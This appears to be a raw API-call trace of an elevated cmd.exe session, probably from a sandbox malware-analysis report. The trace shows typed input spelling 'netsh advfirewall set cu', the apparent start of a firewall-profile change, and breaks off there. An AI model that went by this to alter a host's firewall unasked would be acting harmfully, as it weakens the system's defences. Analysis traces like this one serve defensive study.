LCType=0x36, lpLCData=0x4ab5a360, cchData=32 | out: lpLCData="Sat") returned 4 [0124.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab5a700, cchData=32 | out: lpLCData="Sun") returned 4 [0124.367] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab47b40, cchData=8 | out: lpLCData=".") returned 2 [0124.367] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab5a4e0, cchData=8 | out: lpLCData=",") returned 2 [0124.367] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0124.368] GetProcessHeap () returned 0x2e0000 [0124.368] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20c) returned 0x2f95a0 [0124.368] GetConsoleTitleW (in: lpConsoleTitle=0x2f95a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.369] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.369] GetFileType (hFile=0xb8) returned 0x3 [0124.370] BrandingFormatString () returned 0x2f97c0 [0124.376] GetVersion () returned 0x1db10106 [0124.376] _vsnwprintf (in: _Buffer=0x20fad0, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x20fa68 | out: _Buffer="6.1.7601") returned 8 [0124.376] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.376] GetFileType (hFile=0xb8) returned 0x3 [0124.376] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4ab56340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0124.377] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4ab56340, nSize=0x2000, Arguments=0x20fa70 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0124.377] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.377] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0124.377] WriteFile (in: hFile=0xb8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x20f9f8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x20f9f8*=0x24, lpOverlapped=0x0) returned 1 [0124.377] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x20fa98 | out: _Buffer="\r\n") returned 2 [0124.377] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.377] GetFileType (hFile=0xb8) returned 0x3 [0124.377] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.377] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0124.377] WriteFile (in: hFile=0xb8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20fa68, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x20fa68*=0x2, lpOverlapped=0x0) returned 1 [0124.377] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x20fa98 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0124.377] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.377] GetFileType (hFile=0xb8) returned 0x3 [0124.377] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.377] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0124.377] WriteFile (in: hFile=0xb8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x20fa68, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x20fa68*=0x3f, lpOverlapped=0x0) returned 1 [0124.378] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x20fa98 | out: _Buffer="\r\n") returned 2 [0124.378] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.378] GetFileType (hFile=0xb8) returned 0x3 [0124.378] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.378] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0124.378] WriteFile (in: hFile=0xb8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20fa68, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x20fa68*=0x2, lpOverlapped=0x0) returned 1 [0124.378] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000 [0124.378] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b223d0 [0124.378] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b18290 [0124.378] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b217e0 [0124.378] _get_osfhandle (_FileHandle=0) returned 0xac [0124.378] GetFileType (hFile=0xac) returned 0x3 [0124.378] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0124.378] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x20f8c0 | out: TokenHandle=0x20f8c0*=0x0) returned 0xc000007c [0124.378] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x20f8c0 | out: TokenHandle=0x20f8c0*=0x50) returned 0x0 [0124.378] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x20f8d0, TokenInformationLength=0x4, ReturnLength=0x20f8d8 | out: TokenInformation=0x20f8d0, ReturnLength=0x20f8d8) returned 0x0 [0124.378] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x20f8d8, TokenInformationLength=0x4, ReturnLength=0x20f8d0 | out: TokenInformation=0x20f8d8, ReturnLength=0x20f8d0) returned 0x0 [0124.379] NtClose (Handle=0x50) returned 0x0 [0124.379] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x20f8a0, nSize=0x0, Arguments=0x20f8a8 | out: lpBuffer="\x97c0\x2f") returned 0xf [0124.379] GetProcessHeap () returned 0x2e0000 [0124.379] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2f9be0 [0124.379] GetConsoleTitleW (in: lpConsoleTitle=0x20f8f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.380] wcsstr (_Str="C:\\Windows\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0124.380] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0124.416] GetProcessHeap () returned 0x2e0000 [0124.416] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9be0 | out: hHeap=0x2e0000) returned 1 [0124.416] LocalFree (hMem=0x2f97c0) returned 0x0 [0124.416] GetProcessHeap () returned 0x2e0000 [0124.416] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2faa10 | out: hHeap=0x2e0000) returned 1 [0124.416] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x20f5d8 | out: _Buffer="\r\n") returned 2 [0124.416] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.416] GetFileType (hFile=0xb8) returned 0x3 [0124.416] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.416] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0124.416] WriteFile (in: hFile=0xb8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f5a8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x20f5a8*=0x2, lpOverlapped=0x0) returned 1 [0124.417] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0124.417] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0124.417] _vsnwprintf (in: _Buffer=0x4ab3eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x20f5e8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0124.417] _vsnwprintf (in: _Buffer=0x4ab3eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x20f5e8 | out: _Buffer=">") returned 1 [0124.417] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.417] GetFileType (hFile=0xb8) returned 0x3 [0124.417] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.417] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0124.417] WriteFile (in: hFile=0xb8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x20f5d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x20f5d8*=0x14, lpOverlapped=0x0) returned 1 [0124.417] _get_osfhandle (_FileHandle=0) returned 0xac [0124.417] GetFileType (hFile=0xac) returned 0x3 [0124.417] _get_osfhandle (_FileHandle=0) returned 0xac [0124.417] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.417] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.417] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e320, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0124.417] _get_osfhandle (_FileHandle=0) returned 0xac [0124.417] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.418] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.418] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e322, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0124.418] _get_osfhandle (_FileHandle=0) returned 0xac [0124.418] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.418] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.418] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e324, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0124.418] _get_osfhandle (_FileHandle=0) returned 0xac [0124.418] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.418] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.418] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e326, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0124.418] _get_osfhandle (_FileHandle=0) returned 0xac [0124.418] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.418] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.418] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e328, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0124.418] _get_osfhandle (_FileHandle=0) returned 0xac [0124.418] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.419] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.419] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32a, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0124.419] _get_osfhandle (_FileHandle=0) returned 0xac [0124.419] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.419] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.419] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0124.419] _get_osfhandle (_FileHandle=0) returned 0xac [0124.419] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.419] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.419] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32e, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0124.419] _get_osfhandle (_FileHandle=0) returned 0xac [0124.419] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.419] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.419] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e330, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0124.419] _get_osfhandle (_FileHandle=0) returned 0xac [0124.419] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.419] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.419] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e332, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0124.419] _get_osfhandle (_FileHandle=0) returned 0xac [0124.419] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.419] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.419] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e334, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0124.419] _get_osfhandle (_FileHandle=0) returned 0xac [0124.419] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.419] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.420] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e336, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0124.420] _get_osfhandle (_FileHandle=0) returned 0xac [0124.420] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.420] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.420] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e338, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0124.420] _get_osfhandle (_FileHandle=0) returned 0xac [0124.420] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.420] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.420] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33a, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0124.420] _get_osfhandle (_FileHandle=0) returned 0xac [0124.420] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.420] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.420] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0124.420] _get_osfhandle (_FileHandle=0) returned 0xac [0124.420] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.420] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.420] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33e, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0124.420] _get_osfhandle (_FileHandle=0) returned 0xac [0124.420] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.420] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.420] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e340, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0124.420] _get_osfhandle (_FileHandle=0) returned 0xac [0124.420] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.420] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.421] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e342, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0124.421] _get_osfhandle (_FileHandle=0) returned 0xac [0124.421] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.421] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.421] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e344, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0124.421] _get_osfhandle (_FileHandle=0) returned 0xac [0124.421] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.421] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.421] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e346, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0124.421] _get_osfhandle (_FileHandle=0) returned 0xac [0124.421] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.421] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.421] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e348, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0124.421] _get_osfhandle (_FileHandle=0) returned 0xac [0124.421] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.421] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.421] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34a, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0124.421] _get_osfhandle (_FileHandle=0) returned 0xac [0124.421] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.421] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.421] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34c, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0124.421] _get_osfhandle (_FileHandle=0) returned 0xac [0124.421] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.421] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.422] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 